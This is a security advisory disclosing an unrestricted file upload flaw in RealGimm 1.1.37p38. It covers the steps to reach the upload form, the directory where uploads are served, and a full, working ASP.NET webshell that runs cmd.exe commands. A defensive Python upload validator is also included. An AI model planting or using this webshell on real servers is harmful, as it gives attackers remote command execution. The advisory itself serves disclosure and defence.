An unrestricted file upload vulnerability was found in RealGimm version 1.1.37p38. The vulnerability was exploited to obtain remote command execution by uploading a webshell. What follows is a description of the steps taken to perform the exploit.
The vulnerable form can be found under the section patrimonio -> documentale -> gestione. When that link is clicked, the following pop-up window opens.
This feature can be used to manage and attach documents to certain database entities.
In order to exploit it, we first search for an existing immobile (property) ID. Once an existing item has been found, it is possible to attach a new version of a document by clicking the button highlighted in the following figure.
At this point it is possible to upload a file and verify that the application performs no check on the uploaded file: neither its extension nor its content is validated. Any file type can therefore be uploaded, including .aspx pages, which the ASP.NET runtime will execute if they are stored under the application root.
All uploaded files are stored, under their original file name, in the following web-accessible directory inside the application root:
https://[RealGimm Host]/RealGimmWeb/Temp/Upload/<file_name>
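The following Python is an added illustration, not RealGimm code and not GruppoSCAI's actual fix, of the server-side checks whose absence made this upload exploitable: an extension allow-list that rejects ASP.NET handler and configuration extensions wherever they appear in the name (so double extensions such as doc.pdf.aspx fail too), a magic-byte check that the content matches the declared type, a server-generated random file name, and storage in a directory outside the web root. It generalizes beyond the .aspx case on this page to the other extensions IIS/ASP.NET treats as code; the allowed type list, the store directory and the function names are assumptions.

```python
import os
import secrets
from dataclasses import dataclass

# Hypothetical upload validation logic, added as an illustration.
# Not RealGimm code and not GruppoSCAI's fix; names and paths are assumed.

# Extensions the "attach a document" function actually needs, each with the
# magic bytes a file of that type must begin with.
ALLOWED_TYPES = {
    ".pdf": (b"%PDF-",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

# Extensions the ASP.NET pipeline or IIS treats as code or configuration.
# Rejected anywhere in the name, so "doc.aspx.pdf" and "doc.pdf.aspx" both fail.
SCRIPT_EXTS = {".aspx", ".asp", ".ashx", ".asmx", ".asax", ".ascx",
               ".cshtml", ".vbhtml", ".config", ".php", ".jsp"}


@dataclass
class UploadDecision:
    accepted: bool
    reason: str
    stored_name: str = ""   # server-chosen name; the client's name is never reused


def validate_upload(client_name: str, content: bytes) -> UploadDecision:
    """Decide whether the file may be stored and under which name.

    The client-supplied Content-Type header is deliberately ignored: only the
    extension and the first bytes of the content are trusted.
    """
    # Drop any directory component the client sent (e.g. "..\\..\\web.config").
    name = os.path.basename(client_name.replace("\\", "/")).lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return UploadDecision(False, "missing or empty file name/extension")
    exts = ["." + p for p in parts[1:]]
    if any(e in SCRIPT_EXTS for e in exts):
        return UploadDecision(False, "server-side script or config extension")
    final = exts[-1]
    if final not in ALLOWED_TYPES:
        return UploadDecision(False, f"extension {final} not in allow-list")
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[final]):
        return UploadDecision(False, "content does not match declared type")
    # Random server-generated name: the URL cannot be predicted by the uploader
    # and the stored extension is always one from the allow-list.
    return UploadDecision(True, "ok", secrets.token_hex(16) + final)


def store_upload(decision: UploadDecision, content: bytes, store_dir: str) -> str:
    """Write an accepted file into store_dir, which must lie outside the web
    root (assumed path; contrast with RealGimmWeb/Temp/Upload, which is served
    directly by IIS). Returns the path written."""
    if not decision.accepted:
        raise ValueError(decision.reason)
    path = os.path.join(store_dir, decision.stored_name)
    # Mode "xb" fails if the name already exists instead of overwriting it.
    with open(path, "xb") as fh:
        fh.write(content)
    return path


if __name__ == "__main__":
    # Constructed sample inputs: the header of the webshell shown on this page
    # and a minimal PDF header.
    webshell = b'<%@ Page Language="VB" Debug="true" %>\r\n<script runat="server">'
    samples = [
        ("shell.aspx", webshell),
        ("shell.pdf", webshell),
        ("shell.pdf.aspx", b"%PDF-1.4 " + webshell),
        ("../../web.config", b"<configuration/>"),
        ("contract.pdf", b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n"),
    ]
    for name, data in samples:
        d = validate_upload(name, data)
        print(f"{name:20} accepted={d.accepted} reason={d.reason} stored={d.stored_name}")
```

Running the block shows only contract.pdf being accepted, and it is accepted under a random 32-character hexadecimal name rather than the name the client chose. Even if a check were bypassed, the file would be written by store_upload to a directory IIS does not serve, so a stored .aspx could not be reached by URL the way the Temp/Upload path above can.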
We proceeded by uploading the following webshell (taken from a publicly available source).
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
' Runs the program entered in the "Program" box with the arguments from the
' "Arguments" box, captures its standard output and shows it in the "result" label.
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
' UseShellExecute must be False for standard output to be redirected.
myProcessStartInfo.UseShellExecute = false
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xcmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
' HTML-escape the output so it is rendered verbatim inside the <pre> block.
mystring=replace(mystring,"<","&lt;")
mystring=replace(mystring,">","&gt;")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script>
<html>
<body>
<%-- Program and arguments default to cmd.exe /c net user; the button posts back to RunCmd. --%>
<form runat="server">
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
<p><asp:Label id="result" runat="server"></asp:Label>
</form>
</body>
</html>
Finally, we visited the uploaded file's URL and found our webshell ready to execute commands on the server.
GruppoSCAI fixed the vulnerability. The fix was subsequently analyzed and was confirmed to be effective.
As a result of our testing, version 1.1.37p38 is confirmed to be affected by this vulnerability.
Francesco Mercatili
Paolo Caminati
Claudio Rimensi